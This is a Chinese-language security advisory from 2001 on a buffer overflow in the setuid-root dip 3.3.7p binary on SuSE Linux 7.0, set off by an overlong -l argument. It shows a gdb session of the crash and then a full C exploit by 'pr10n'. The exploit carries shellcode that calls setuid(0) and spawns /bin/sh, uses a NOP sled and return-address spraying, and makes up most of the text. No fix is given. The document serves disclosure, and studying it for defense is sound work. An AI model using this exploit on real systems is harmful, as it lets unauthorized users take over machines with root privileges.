dip 3.3.7p存在缓冲溢出漏洞发布时间:2001-07-10 更新时间:2001-07-10 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 dip 3.3.7p-详细描述 SuSE linux 7.0 x86 中的/usr/sbin/dip是默认以SETUID ROOT的身份 安装的,其中在处理-l参数时存在缓冲溢出。 root@faust:/home/hegi > gdb /usr/sbin/dip GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-suse-linux"...(no debugging symbols found)... (gdb) run -k -l `perl -e 'print "a" x 130 '` Starting program: /usr/sbin/dip -k -l `perl -e 'print "a" x 130 '` DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96) Written by Fred N. van Kempen, MicroWalt Corporation. DIP: cannot open /var/lock/LCK..aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Datei oder Verzeichnis nicht gefunden Program received signal SIGSEGV, Segmentation fault. 0x61616161 in ?? () 测试代码 /* Linux x86 dip 3.3.7p exploit by pr10n */ #include <stdio.h> #define NOP 0x90 /*thanks to hack.co.za*/ char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d" "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3" "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0" "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh"; unsigned long get_sp(void){ __asm__("movl %esp, %eax");} main(int argc, char *argv[]){ char buf[136]; int i; int offset=0,*ptr; long ret; if(argc!=2){ printf("usage: %s offset\n",argv[0]); exit(0);} offset=atoi(argv[1]); ret=(get_sp()-offset); for(i=1;i<136;i+=4){ *(long *)&buf[i]=ret;} printf("\nusing: 0x%x\n\n",ret); for(i=0;i<(sizeof(buf)-strlen(shellcode)-40);i++) buf[i]=NOP; memcpy(buf+i,shellcode,strlen(shellcode)); execl("/usr/sbin/dip","dip","-k","-l",buf,(char *)0); } 解决方案 尚无 相关信息 |
